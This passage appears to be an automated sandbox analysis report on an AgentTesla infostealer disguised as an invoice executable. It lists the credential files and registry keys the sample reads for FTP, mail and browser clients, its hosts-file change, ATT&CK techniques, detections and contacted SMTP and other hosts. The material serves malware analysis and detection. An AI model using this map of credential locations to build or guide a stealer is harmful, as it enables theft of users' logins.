                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation311Path InterceptionProcess Injection12Masquerading1OS Credential Dumping2Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsFile and Directory Permissions Modification1Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion241SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion241NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection12LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      INVOICE & TELEX BL_PDF.exe38%VirustotalBrowse
                      INVOICE & TELEX BL_PDF.exe33%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      smtp.zfftcn.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://Dsl8ffzBvoWnMQBLSV.net0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cnL0%URL Reputationsafe
                      http://Dmxfln.com0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.fontbureau.comasTF0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.fontbureau.comalsF0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://smtp.zfftcn.com0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/%0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.founder.com.cn/cnv-s_0%Avira URL Cloudsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.fontbureau.comR.TTF0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
                      http://www.fontbureau.comcoma0%URL Reputationsafe
                      http://www.sajatypeworks.comtf0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.fontbureau.comT0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.fontbureau.comituF0%URL Reputationsafe
                      http://www.founder.com.cn/cn10%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://en.wikipediaHWV0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.fontbureau.comce0%URL Reputationsafe
                      http://www.fontbureau.comals0%URL Reputationsafe
                      http://www.fontbureau.comx0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/oby0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      		208.91.199.225
                      		truefalse
                        		high
                        smtp.zfftcn.com
                        		unknown
                        		unknowntrueunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                          		high
                          http://Dsl8ffzBvoWnMQBLSV.netINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000003.522926739.00000000012A4000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557862224.00000000033EC000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers/?INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnLINVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://Dmxfln.comINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://us2.smtp.mailhostbox.comINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                		high
                                http://www.tiro.comINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comasTFINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.goodfont.co.krINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comalsFINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296860370.000000000565C000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comINVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://smtp.zfftcn.comINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557817796.00000000033DD000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.org%GETMozilla/5.0INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		low
                                  http://www.fonts.comINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/%INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sandoll.co.krINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnv-s_INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sakkal.comINVOICE & TELEX BL_PDF.exe, 00000001.00000003.293857674.0000000005684000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipINVOICE & TELEX BL_PDF.exe, 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comR.TTFINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.292202005.0000000005657000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                          		high
                                          http://DynDns.comDynDNSINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comFINVOICE & TELEX BL_PDF.exe, 00000001.00000003.297199473.000000000565E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.rspb.org.uk/wildlife/birdguide/name/INVOICE & TELEX BL_PDF.exefalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comcomaINVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comtfINVOICE & TELEX BL_PDF.exe, 00000001.00000003.290081835.000000000566B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haINVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comTINVOICE & TELEX BL_PDF.exe, 00000001.00000003.301053046.0000000005657000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comaINVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://en.wINVOICE & TELEX BL_PDF.exe, 00000001.00000003.290170876.0000000005656000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ipify.org%$INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.carterandcone.comlINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comituFINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn1INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291403933.0000000005658000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnINVOICE & TELEX BL_PDF.exe, 00000001.00000003.291343756.0000000005657000.00000004.00000001.sdmp, INVOICE & TELEX BL_PDF.exe, 00000001.00000003.291477234.0000000005657000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://en.wikipediaHWVINVOICE & TELEX BL_PDF.exe, 00000001.00000003.289878864.0000000005673000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlINVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/cabarga.htmlINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296581005.000000000565D000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comceINVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comalsINVOICE & TELEX BL_PDF.exe, 00000001.00000003.297973029.000000000565C000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comxINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/obyINVOICE & TELEX BL_PDF.exe, 00000001.00000003.292953266.000000000565B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
